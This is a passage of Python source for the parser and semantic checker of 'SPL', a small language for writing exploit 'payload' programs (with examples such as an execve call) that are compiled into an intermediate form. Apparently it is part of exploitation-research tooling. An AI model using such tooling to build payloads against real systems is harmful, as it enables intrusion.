Multi\n# line comments are not supported. The specs of the language (expressed in EBNF) are shown below:\n#\n#       <SPL>    := 'void' 'payload' '(' ')' '{' <stmts> '}'\n#       <stmts>  := ( <stmt> | <label> )* <return>?\n#       <stmt>   := <varset> | <regset> | <regmod> | <memrd> | <memwr> | <call> | <cond> | <jump>\n#\n#       <varset> := 'int' <var> '=' <rvalue> ';'\n#                 | 'int' <var> '=' '{' <rvalue> (',' <rvalue>)* '}' ';'\n#                 | 'string' <var> '=' <str> ';'\n#       <regset> := <reg> '=' <rvalue> ';'\n#       <regmod> := <reg> <asgop> <number> ';'\n#       <memrd>  := <reg> '=' '*' <reg> ';'\n#       <memwr>  := '*' <reg> '=' <reg> ';'\n#       <call>   := <var> '(' (e | <reg> (',' <reg>)*) ')'\n#       <label>  := <var> ':'\n#       <cond>   := 'if' '(' <reg> <cmpop> <number> ')' 'goto' <var> ';'\n#       <jump>   := 'goto' <var> ';'\n#       <return> := 'return' <number> ';'\n#\n#       <reg>    := '__r' <regid>\n#       <regid>  := [0-7]\n#       <var>    := [a-zA-Z_][a-zA-Z_0-9]*\n#       <number> := ('+' | '-')? [0-9]+ | '0x' [0-9a-fA-F]+\n#       <rvalue> := <number> | '&' <var>\n#       <str>    := '\"' [.]* '\"'\n#       <asgop>  := '+=' | '-=' | '*=' | '/=' | '&=' | '|=' | '~=' | '^=' | '>>=' | '<<='\n#       <cmpop>  := '==' | '!=' | '>' | '>=' | '<' | '<='\n#\n#\n# Here's what the IR looks like:\n#\n#   {'uid': 2, 'type': 'regset', 'reg': 0, 'valty': 'num', 'val': -10}\n#   {'uid': 6, 'type': 'varset', 'name': 'test', 'val': ['a1']}\n#   {'uid': 10,'type': 'varset', 'name': 'bar',\n#                           'val': ['\\xd2\\x04\\x00\\x00\\x00\\x00\\x00\\x00', ('foo',), ('test',)]}\n#   {'uid': 12, 'type': 'regset', 'reg': 6, 'valty': 'var', 'val': ('bar',)}\n#   {'uid': 18, 'type': 'regmod', 'reg': 6, 'op': '+', 'val': 17712}\n#   {'uid': 6,  'type': 'memrd', 'reg': 0, 'mem': 1}\n#   {'uid': 8,  'type': 'memwr', 'mem': 0, 'val': 1}\n#   {'uid': 20, 'type': 'label'}\n#   {'uid': 24, 'type': 'call', 'name': 'execve', 'args': 
[0, 1, 6], 'dirty': ['rax', 'rcx', 'rdx']}\n#   {'uid': 30, 'type': 'cond', 'reg': 0, 'op': '==', 'num': 11, 'target': '@__26'}\n#   {'uid': 32, 'type': 'jump', 'target': '@__20'}\n#   {'uid': 34, 'type': 'return', 'target': 0xdead}\n#\n# NOTE: The compiler is implemented using regular expressions, and not using flex/bison, as the\n#   language is too simple. So, be careful about the language syntax, as very small differences\n#   (that may not affect other languages) can result in syntax errors.\n#\n#\n# * * * ---===== TODO list =====--- * * *\n#\n#   [1]. Consider the control flow of the SPL program upon \"Semantic check #4\".\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nfrom calls     import *\n\nimport struct\nimport shlex\nimport re\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\nN_VIRTUAL_REGISTERS = 8                             # number of virtual registers\n\nSTATE_IDLE          = 0                             # program is in idle state\nSTATE_START         = 1                             # state after we encounter !PROGRAM START\nSTATE_END           = 2                             # state after we encounter !PROGRAM END\n\n# tokens come in tuples (symbol, lineno). To make code easier to read, don't use 0 and 1 to\n# access them, but instead use T and L\nT = 0\nL = 1\n\n# Instead of incrementing pc and uid by one, we can increment them by two (or by larger intervals).\n# This has to do with optimization. 
If we want to \"inject\" a new statement, we can do that without\n# modifying the pc/uid of the other statements.\n_STEP_UP = 2                                        # 2 is ok for current optimizer\n\n\n# WARNING: Don't try to use modulo operator ;)\nasg_ops = ['+=', '-=', '*=', '/=', '&=', '|=', '^=', '~=', '>>=', '<<=']\ncmp_ops = ['==', '!=', '>',  '>=', '<',  '<=']\n\n\n# The regular expressions to match various tokens. Note that the alternatives are grouped,\n# so that ^ and $ anchor every alternative (and not just the first and last ones)\n_reg_    = r'^__r[0-7]$'\n_var_    = r'^[a-zA-Z_][a-zA-Z_0-9]*$'\n_number_ = r'^(((\\+|\\-)?[0-9]+)|(0x[0-9a-fA-F]+))$'\n_rvalue_ = r'^(((\\+|\\-)?[0-9]+)|(0x[0-9a-fA-F]+)|(\\&[a-zA-Z_][a-zA-Z_0-9]*))$'\n_asgop_  = r'^(\\+=|\\-=|\\*=|\\/=|\\&=|\\|=|\\^=|\\~=|\\>\\>=|\\<\\<=)$'\n_cmpop_  = r'^(\\=\\=|\\!\\=|\\>\\=|\\>|\\<\\=|\\<)$'\n\n\n\n\n# -------------------------------------------------------------------------------------------------\n# compile: This is the main class that compiles an SPL program into its equivalent IR form.\n#\nclass compile( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL VARIABLES                                    '''\n    ''' ======================================================================================= '''\n    __prog          = ''                            # program's file name\n    __state         = STATE_IDLE                    # program's state\n    __lineno        = 1                             # current line number for parsing\n    __pc            = START_PC                      # program counter (initialized)\n    __uid           = 0                             # IR unique identifier\n    __label_dict    = { }                           # label lookup\n    __vartab        = { }                           # variable table\n    __ir            = [ ]                           # intermediate list\n\n\n    ''' ======================================================================================= 
'''\n    '''                                   AUXILIARY FUNCTIONS                                   '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __syn_err(): A syntax error is fatal. Print a verbose explanation and halt execution.\n    #\n    # :Arg err: Error to display\n    # :Ret: None.\n    #\n    def __syn_err( self, err, lineno ):\n        fatal(\"%s:%d : Syntax Error: %s\" % (self.__prog, lineno, err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __sem_err(): A semantic error is fatal as well. Print a verbose explanation and halt\n    #       execution.\n    #\n    # :Arg err: Error to display\n    # :Ret: None.\n    #\n    def __sem_err( self, err ):\n        fatal(\"%s : Semantic Error: %s\" % (self.__prog, err))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __sem_warn(): A semantic warning isn't fatal, but it's still important. Print a verbose\n    #       explanation and continue execution.\n    #\n    # :Arg err: Error to display\n    # :Ret: None.\n    #\n    def __sem_warn( self, msg ):\n        warn(\"%s : Semantic Warning: %s\" % (self.__prog, msg))\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __multi_re(): Extend regular expression matching to lists. Instead of applying 1 regex in a\n    #       single string, __multi_re() applies a list of regexes in a list of strings. 
A list of\n    #       errors is also supplied in case that a regex fails.\n    #\n    # :Arg stmt: List of statements to match\n    # :Arg regex: List of regular expressions for statements\n    # :Arg err: List of errors in case of a mismatch\n    # :Ret: None.\n    #\n    def __multi_re( self, stmt, regex, err ):\n        stmt, lno = zip(*stmt)\n\n        if len(stmt) != len(regex):                 # check if parameters match\n            self.__syn_err( \"Invalid number of parameters\", lno[0] )\n\n        for i in range(len(stmt)):                  # for each string in list\n            try:\n                if not re.match(regex[i], stmt[i]): # apply regex\n                    self.__syn_err(\"%s '%s'\" % (err[i], stmt[i]), lno[i])\n            except IndexError: pass\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __ir_add(): Add a \"compiled\" statement to IR.\n    #\n    # :Arg tup: A tuple containing the statement\n    # :Ret: None.\n    #\n    def __ir_add( self, tup ):\n        # extend statement and add it to IR (along with its pc)\n        self.__ir.append( ['@__' + str(self.__pc), dict([('uid',self.__uid)] + tup.items())] )\n\n        # __pc and __uid are equal for now, but they're going be different after optimization.\n        self.__pc  = self.__pc  + _STEP_UP          # increase program counter\n        self.__uid = self.__uid + _STEP_UP          # assign a unique id to each statement\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     SYNTAX ANALYSIS                                     '''\n    ''' ======================================================================================= '''\n\n    # 
---------------------------------------------------------------------------------------------\n    # __check_prog_state(): A decorator function (== hook) that is invoked before parsing every\n    #       statement and verifies that all statements are inside the payload() declaration.\n    #\n    # :Arg func: Function to invoke from decorator\n    # :Ret: Decorator function.\n    #\n    def __check_prog_state( func ):\n        def stmt_intrl( self, stmt ):\n            dbg_prnt(DBG_LVL_3, \"Parsing statement: \" + ' '.join(zip(*stmt)[0]))\n\n            if self.__state != STATE_START:\n                self.__syn_err(\"Statement outside of payload() declaration\", stmt[0][L])\n\n            func(self, stmt)                        # invoke the appropriate statement function\n\n        return stmt_intrl                           # return decorator\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_program(): A payload declaration has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    def __stmt_program( self, stmt ):\n        if self.__state == STATE_IDLE:\n            # we haven't declared payload() yet. 
Make sure that declaration is \"void payload() {\"\n            if len(stmt) != 5:\n                self.__syn_err(\"Invalid number of operands\", stmt[0][L])\n\n            self.__multi_re(stmt,\n                [r'^void$', r'^payload$', r'^\\($', r'^\\)$', r'^\\{$'],\n                [\"Invalid function declaration\"]*5\n            )\n\n            self.__state = STATE_START              # change state\n\n            # A pseudo-statement to avoid corner cases (needed for building the delta graph)\n            self.__ir_add( {'type':'entry'} )\n\n\n        elif self.__state == STATE_START:\n            # we're looking to close payload() declaration (\"}\")\n            if len(stmt) != 1:\n                self.__syn_err(\"Code outside of function!\", stmt[1][L])\n\n            self.__multi_re(stmt, [r'^}$'],[\"Unknown\"] )\n\n            self.__state = STATE_END                # change state\n\n\n        else:\n            self.__syn_err(\"Invalid program state\", stmt[0][L])\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_var(): A variable assignment has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_var( self, stmt ):\n        # stmt[0] has already been checked. 
Some checks are redundant here, but we do them to keep\n        # functions autonomous.\n\n        # ---------------------------------------------------------------------\n        if re.search(r'^string$', stmt[0][T]):\n            # start with the easy one\n            self.__multi_re( stmt[1:],\n                [_var_, r'^=$', r'^\".*\"$',],\n                [\"Invalid variable name\", \"Expected '=', but found\", \"Invalid assigned value\"]\n            )\n\n            val = [stmt[3][T][1:-1].decode('string_escape')]\n\n        # ---------------------------------------------------------------------\n        elif re.search(r'^int$', stmt[0][T]):\n            self.__multi_re( stmt[1:3],\n                [_var_, r'^=$'],\n                [\"Invalid variable name\", \"Expected '=', but found\"]\n            )\n\n            try:\n                if re.search(_rvalue_, stmt[3][T]): # single R-value\n\n                    if stmt[3][T][0] == '&':\n                        val = [(stmt[3][T][1:],)]\n                    else:\n                        val = [struct.pack('<Q', int(stmt[3][T], 0))]\n\n                else:                               # array of R-values\n                    val = []\n\n                    self.__multi_re( [stmt[3]] + [stmt[4]] + [stmt[-1]],\n                        [r'^\\{$', _rvalue_, r'^\\}$'],\n                        [\"Expected '{', but found\", \"Invalid R-value\", \"Expected '}', but found\"]\n                    )\n\n                    if stmt[4][T][0] == '&':\n                        val.append( (stmt[4][T][1:],) )\n                    else:\n                        val.append(struct.pack('<Q', int(stmt[4][T], 0)))\n\n                    # parse all R-values\n                    for i in range(5, len(stmt)-1, 2):\n                        self.__multi_re( [stmt[i]] + [stmt[i+1]],\n                            [r'^,$', _rvalue_],\n                            [\"Expected ',', but found\", \"Invalid R-value\" ]\n                     
   )\n\n                        if stmt[i+1][T][0] == '&':\n                            val.append( (stmt[i+1][T][1:],) )\n                        else:\n                            val.append(struct.pack('<Q', int(stmt[i+1][T], 0)))\n\n            except IndexError:\n                self.__syn_err(\"Invalid number of arguments\", stmt[0][L])\n\n        # ---------------------------------------------------------------------\n        else:\n            self.__syn_err(\"Invalid type\", stmt[0][L])\n\n\n        # ---------------------------------------------------------------------\n        # This is a semantic check, but it's better to do it here\n        # ---------------------------------------------------------------------\n        if stmt[1][T] in self.__vartab:             # check if variable has already been declared\n            self.__sem_err(\"Redeclaration of '%s'\" % stmt[1][T])\n\n        self.__vartab[ stmt[1][T] ] = val           # if not, add variable to vartab\n\n        # add statement to IR\n        self.__ir_add( {'type':'varset', 'name':stmt[1][T], 'val':val} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_reg(): A register assignment/modification or a memory read has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_reg( self, stmt ):\n        self.__multi_re( [stmt[0]], [_reg_], [\"Invalid register name\"])\n\n\n        # ---------------------------------------------------------------------\n        # Memory read\n        # ---------------------------------------------------------------------\n        if re.search(r'^=$', stmt[1][T]) and re.search(r'^\\*$', stmt[2][T]) and len(stmt) == 4:\n            self.__multi_re( [stmt[3]], [_reg_], [\"Invalid R-value\"])\n\n            self.__ir_add({'type':'memrd', 'reg':int(stmt[0][T][3],0), 'mem':int(stmt[3][T][3],0)})\n\n\n        # 
---------------------------------------------------------------------\n        # Register assignment\n        # ---------------------------------------------------------------------\n        elif re.search(r'^=$', stmt[1][T]) and len(stmt) == 3:\n            self.__multi_re( [stmt[2]], [_rvalue_], [\"Invalid R-value\"])\n\n            if stmt[2][T][0] == '&':\n                self.__ir_add( {'type'  : 'regset',\n                                'reg'   : int(stmt[0][T][3]),\n                                'valty' : 'var',\n                                'val'   : (stmt[2][T][1:],)} )\n\n            else:\n                self.__ir_add( {'type'  : 'regset',\n                                'reg'   : int(stmt[0][T][3]),\n                                'valty' : 'num',\n                                'val'   : int(stmt[2][T], 0)} )\n\n\n        # ---------------------------------------------------------------------\n        # Register modification\n        # ---------------------------------------------------------------------\n        elif re.search(_asgop_, stmt[1][T]) and len(stmt) == 3:\n            self.__multi_re( [stmt[2]], [_number_], [\"Invalid number\"])\n\n\n            self.__ir_add( {'type': 'regmod',\n                            'reg' : int(stmt[0][T][3]),\n                            'op'  : stmt[1][T][:-1],\n                            'val' : int(stmt[2][T], 0)} )\n\n        # ---------------------------------------------------------------------\n        # Unknown register operation\n        # ---------------------------------------------------------------------\n        else:\n            self.__syn_err(\"Unknown operator '%s'\" % stmt[1][T], stmt[1][L])\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_memwr(): A memory write statement has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_memwr( 
self, stmt ):\n        self.__multi_re( stmt,\n            [r'^\\*$', _reg_, r'^=$', _reg_],\n            [\"Expected '*', but found\", \"Invalid register name\", \"Expected '=', but found\",\n             \"Invalid register name\"]\n        )\n\n        self.__ir_add( {'type':'memwr', 'mem':int(stmt[1][T][3],0), 'val':int(stmt[3][T][3],0)} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_call(): A library/system call has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_call( self, stmt ):\n        call = find_call(stmt[0][T])\n\n        if not call:\n            self.__syn_err( \"Function '%s' is not supported\" % stmt[0][T], stmt[0][L] )\n\n        # this check is redundant\n        self.__multi_re( [stmt[1]] + [stmt[-1]],\n            [r'^\\($', r'^\\)$'],\n            [\"Expected '(', but found\", \"Expected ')', but found\"]\n        )\n\n        args = []\n        if len(stmt) - 3 > 0:\n            for i in range(2, len(stmt)-1, 2):\n                self.__multi_re( [stmt[i]] + [stmt[i+1]],\n                    [_reg_, r'^,$' if len(stmt)-2 > i+1 else r'^\\)$'],\n                    [\"Invalid register name\", \"Unexpected symbol\"]\n                )\n\n                args.append( int(stmt[i][T][3]) )\n\n\n        # both syscalls and libcalls have the same calling convention (in x64) so we're good ;)\n        # we don't need to distinguish them\n\n        # check if call has the right number of arguments (for non-variadic ones)\n        if len(args) != call[1] and call[1] != INFINITY:\n            self.__syn_err( \"Function '%s' has an invalid number of arguments\" %\n                    stmt[0][T], stmt[0][L] )\n\n        # check max number of registers (arguments) in calling convention\n        maxlen = len(SYSCALL_CC) if find_syscall(stmt[0][T]) else len(LIBCALL_CC)\n\n        if len(args) > maxlen:\n            self.__syn_err(\"SPL supports functions with up to %d arguments\" % maxlen, stmt[0][L])\n\n\n        self.__ir_add( {'type':'call', 'name':stmt[0][T], 'args':args, 'dirty':call[2], 'alt':[]} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_label(): A label has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_label( self, stmt ):\n        # check if label is in correct form\n        self.__multi_re( stmt, [_var_], [\"Invalid label name\"] )\n\n        # give a UID to that label\n        # Our semantic analysis states that \"every label must be followed by a statement\". So we\n        # set the UID to be equal with the UID of the next statement. This is because labels\n        # are pseudo-statements (they're not part of the IR) and we want the jump target to be\n        # at the statement after it.\n        #\n        # (self.__pc points to the current statement, so +_STEP_UP will point to the next)\n        self.__label_dict[ stmt[0][T] ] = '@__' + str(self.__pc + _STEP_UP)\n\n        # add a dummy label (needed for slicing during optimization)\n        self.__ir_add( {'type':'label'} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_cond(): A conditional jump statement has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_cond( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^if$', r'^\\($', _reg_, _cmpop_, _number_, r'^\\)$', r'^goto$', _var_],\n            [\"Expected 'if', but found\",\n             \"Expected '(', but found\",\n             \"Expected register, but found\",\n             \"Invalid comparison operator\",\n             \"Invalid number\",\n             \"Expected ')', but found\",\n             \"Expected 'goto', but found\",\n             \"Invalid goto target\"]\n        )\n\n        # When a conditional jump branches to a label that hasn't been declared yet, we add a\n        # temporary jump target. After parsing is done, __label_dict will contain all labels,\n        # so we can go back and fix missing targets.\n        self.__ir_add( {'type'   : 'cond',\n                        'reg'    : int(stmt[2][T][3]),\n                        'op'     : stmt[3][T],\n                        'num'    : int(stmt[4][T], 0),\n                        'target' : stmt[7][T]} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_jump(): A jump statement (goto) has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_jump( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^goto$', _var_],\n            [\"Expected 'goto', but found\", \"Invalid goto target\"]\n        )\n\n        self.__ir_add( {'type':'jump', 'target':stmt[1][T]} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __stmt_return(): A return statement has been encountered.\n    #\n    # :Arg stmt: Statement to process\n    # :Ret: None.\n    #\n    @__check_prog_state\n    def __stmt_return( self, stmt ):\n        self.__multi_re( stmt,\n            [r'^return$', _number_],\n            [\"Expected 'return', but found\", \"Invalid return address\"]\n        )\n\n        self.__ir_add( {'type':'return', 'target':int(stmt[1][T],0)} )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __do_syntax_parsing(): This is where syntax analysis starts. 
Function takes as input the SPL\n    #       program (expressed as a list of tokens) and checks whether it follows the EBNF.\n    #\n    # :Arg tokens: A list of all tokens from the SPL program\n    # :Ret: None. If a syntax error occurs, an exception will be raised.\n    #\n    def __do_syntax_parsing( self, tokens ):\n\n        # -------------------------------------------------------------------------------\n        # Merge tokens into statements\n        # -------------------------------------------------------------------------------\n        stmts, stmt = [], []\n\n        for symbol, lineno in tokens:               # for each token\n            if symbol != ';' and symbol != ':':     # not a statement delimiter?\n\n                # if a memory read/write is used, make sure that '*' operator is separated\n                if re.search(r'^\\*__r.*$', symbol):                     \n                    stmt.append( ('*', lineno) )\n                    stmt.append( (symbol[1:], lineno) )\n                else:\n                    stmt.append( (symbol, lineno) ) # append it to the current statement\n\n            else:                                   # statement delimiter\n                stmts.append(stmt)                  # append statement to the statements list\n                stmt = []                           # clear current statement\n\n        if stmt: stmts.append(stmt)                 # push any leftovers to the list\n\n\n        # The 1st statement should be the function declaration: \"void payload() {\". However it\n        # also contains the 2nd statement (up to the first delimiter). 
Split this statement.\n        stmt = stmts.pop(0)                         # get 1st statement\n\n        if len(stmt) < 5:                           # not the expected size?\n            self.__syn_err(\"Invalid function declaration\", stmt[0][L])\n\n        stmts = [stmt[:5], stmt[5:]] + stmts        # split it and push it back\n\n\n        # -------------------------------------------------------------------------------\n        # To keep the code simple, each statement is parsed in its own function. Here,\n        # we quickly identify the type of statement and we invoke the right function to\n        # further process it.\n        # -------------------------------------------------------------------------------\n        for stmt in stmts:                          # for each statement\n            # function declaration starts with 'void' and ends with '}':\n            #   [('void', 1), ('payload', 1), ('(', 1), (')', 1), ('{', 1)]\n            #   [('}',10)]\n            if re.search(r'^void$', stmt[0][T]) or re.search(r'^}$', stmt[0][T]):\n                self.__stmt_program(stmt)\n\n            # Variable assignments start with 'int' or 'string':\n            #   [('int', 2), ('a', 2), ('=', 2), ('0x10', 2)]\n            elif re.search(r'^int|string$', stmt[0][T]):\n                self.__stmt_var(stmt)\n\n            # Register assignments/modifications and memory reads start with '__r':\n            #   [('__r0', 4), ('=', 4), ('1', 4)]\n            elif re.search(r'^__r.*', stmt[0][T]):\n                self.__stmt_reg(stmt)\n\n\n            # Memory writes start with '*':            \n            #  [('*', 14), ('__r1', 14), ('=', 14), ('__r0', 14)]\n            elif re.search(r'^\\*', stmt[0][T]):\n                self.__stmt_memwr(stmt)\n\n            # Labels consist of a single token:\n            #   [('LABEL', 5)]\n            elif len(stmt) == 1:\n                self.__stmt_label(stmt)\n\n            # Calls have a '(' as 2nd token and a ')' as 
last token:\n            #   [('func', 6), ('(', 6), ('__r0', 6), (',', 6), ('__r1', 6), (',', 6), (')', 6)]\n            #\n            # (we already know that len(stmt) > 1, so we can access stmt[1])\n            elif re.search(r'^\\($', stmt[1][T]) and re.search(r'^\\)$', stmt[-1][T]):\n                self.__stmt_call(stmt)\n\n            # Conditional statements start with 'if':\n            #   [('if', 7), ('(', 7), ('__r0', 7), ('>', 7), ('=', 7), ('0x0', 7), (')', 7),\n            #    ('goto', 7), ('LABEL', 7)]\n            elif re.search(r'^if$', stmt[0][T]):\n                self.__stmt_cond(stmt)\n\n            # Jump statements start with 'goto':\n            #   [('goto', 8), ('LABEL', 8)]\n            elif re.search(r'^goto$', stmt[0][T]):\n                self.__stmt_jump(stmt)\n\n            # Return statements start with 'return':\n            #   [('return', 9), ('0x4006fe', 9)]\n            elif re.search(r'^return$', stmt[0][T]):\n                self.__stmt_return(stmt)\n\n            # Otherwise we have a syntax error...\n            else:\n                self.__syn_err(\"Unknown keyword '%s'\" % stmt[0][T], stmt[0][L])\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                    SEMANTIC ANALYSIS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __fix_jump_targets(): Fix target labels (replace names with pc) for conditional and\n    #       unconditional jumps.\n    #\n    # :Ret: None.\n    #\n    def __fix_jump_targets( self ):\n        dbg_prnt(DBG_LVL_2, \"Fixing jump/goto targets...\")\n\n        for _, stmt in self.__ir:                   # for each jump statement\n            if stmt['type'] == 'cond' or stmt['type'] == 'jump':\n                try:\n                    # find pc that label belongs to\n                    stmt['target'] = self.__label_dict[ stmt['target'] ]\n                except KeyError:\n                    self.__sem_err(\"Label '%s' is not declared\" % stmt['target'])\n\n        dbg_prnt(DBG_LVL_2, \"Done.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __do_semantic_checks(): Perform a basic semantic analysis. This function performs a series\n    #       of semantic checks that the IR has to pass.\n    #\n    # :Ret: None. If a semantic error occurs, an exception will be raised.\n    #\n    def __do_semantic_checks( self ):\n        dbg_prnt(DBG_LVL_2, \"Semantic analysis started.\")\n\n\n        # --------------------------------=[ CHECK #1 ]=---------------------------------\n        # -----------------=[ \"A variable can be declared only once\" ]=------------------\n        #\n        # This check is already done in __stmt_var() as it's way easier to do it there.\n\n\n        # --------------------------------=[ CHECK #2 ]=---------------------------------\n        # ----------=[ \"A return must be the last statement of the program\" ]=-----------\n        nret = len([s for _, s in self.__ir if s['type'] == 'return'])\n\n        if nret > 1 or (nret == 1 and self.__ir[-1][1]['type'] != 'return'):\n            self.__sem_err(\"Only one return is allowed and only at the end of the program\")\n\n\n        # --------------------------------=[ CHECK #3 ]=---------------------------------\n        # --------------------=[ \"A statement must follow a label\" ]=--------------------\n        #\n        # A tricky check. First we check whether the last statement is _not_ a label. 
Then, we get\n        # all statements (we only care about statement type -VARSET, etc) that follow a label\n        # (there's always a next statement after a label, because the last statement is not a label)\n        # and check whether there are labels there.\n        #\n        if self.__ir[-1][1]['type'] == 'label' or \\\n           'label' in [self.__ir[i+1][1]['type'] for i, (_, s) in enumerate(self.__ir) \\\n           if s['type'] == 'label']:\n                self.__sem_err(\"A label must be followed by a statement (labels are not statements)\")\n\n\n        # --------------------------------=[ CHECK #4 ]=---------------------------------\n        # -------=[ \"A variable/register must be assigned before it gets used\" ]=--------\n        #\n        # Here we \"simulate\" the IR. When we encounter an assignment, we mark this variable/\n        # register. When we use a variable/register, we check if it's marked. Note that this\n        # check does not consider the control flow of the program (e.g. 
conditional jumps and\n        # goto).\n        #\n        tvar, treg = { }, { }                       # temp variable and register tables\n\n        for _, stmt in self.__ir:                   # for each statement (linear sweep)\n            \n            # -----------------------------------------------------------------\n            if stmt['type'] == 'varset':\n                for val in stmt['val']:\n                    if isinstance(val, tuple):\n                        if val[0] in tvar:\n                            tvar[ val[0] ] = 1      # mark variable\n                        else:\n                            self.__sem_err(\"Variable '%s' referenced before assignment\" % val[0])\n\n                # add this after isinstance() check to catch cases like $c := [$c]\n                # mark variable (if it's set for 2nd time don't make it 0)\n                tvar[ stmt['name'] ] = tvar.get(stmt['name'], 0) * 1\n\n            \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'regset':\n                if isinstance(stmt['val'], tuple):  # reference of another variable?\n                    if stmt['val'][0] in tvar:\n                        tvar[ stmt['val'][0] ] = 1  # mark variable\n                    else:\n                        self.__sem_err(\"Variable '%s' referenced before assignment\" % stmt['val'][0])\n\n\n                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1\n\n            \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'regmod':\n                if stmt['reg'] in treg:\n                    treg[ stmt['reg'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['reg'])\n                   \n           \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'memrd':\n        
        if stmt['mem'] in treg:\n                    treg[ stmt['mem'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['mem'])\n\n                # mark register being set\n                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1\n\n                \n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'memwr':\n                if stmt['mem'] in treg:\n                    treg[ stmt['mem'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['mem'])\n\n                if stmt['val'] in treg:\n                    treg[ stmt['val'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['val'])\n\n\n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'cond':\n                if stmt['reg'] in treg:\n                    treg[ stmt['reg'] ] = 1\n                else:\n                    self.__sem_err(\"Register '__r%d' referenced before assignment\" % stmt['reg'])\n\n\n            # -----------------------------------------------------------------\n            elif stmt['type'] == 'call':\n                for arg in stmt['args']:\n                    if arg in treg:\n                        treg[ arg ] = 1\n\n                    else:\n                        self.__sem_err(\"Register '__r%d' referenced before assignment\" % arg)\n\n\n        # --------------------------------=[ CHECK #5 ]=---------------------------------\n        # -------------------=[ \"A variable/register must be used\" ]=--------------------\n        #\n        # Here we check whether there are any unused registers/variables. This actually\n        # gets calculated in the previous check. 
If a variable/register is used, its treg/tvar\n        # entry will be 1. Otherwise it's 0. Note that this is a soft error. Execution doesn't\n        # halt when this check fails.\n        #\n        for reg, used in treg.iteritems():\n            if not used:\n                self.__sem_warn(\"Register '__r%d' is unused\" % reg)\n\n        for var, used in tvar.iteritems():\n            if not used:\n                self.__sem_warn(\"Variable '%s' is unused\" % var)\n\n        del treg\n        del tvar\n\n\n        # -----------------------------=[ OPTIONAL CHECKS ]=-----------------------------\n        # There are other checks that we could do as well:\n        #   [1]. A label must be referenced\n        #   [2]. A variable must be declared only once\n        #   ...\n        #\n\n        dbg_prnt(DBG_LVL_2, \"Semantic analysis completed.\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                 MISCELLANEOUS FUNCTIONS                                 '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # _calc_stats(): Collect some statistics regarding the generated IR.\n    #\n    # :Ret: None.\n    #\n    def _calc_stats( self ):\n        # nreal: the number of real statements (those that need a candidate block)\n        self.nreal = 0\n\n        for stmt in self:                           # for each statement\n            if stmt['type'] not in ['entry', 'varset', 'label', 'jump', 'return']:\n                self.nreal += 1\n\n        # nregs contains the number of distinct virtual registers. 
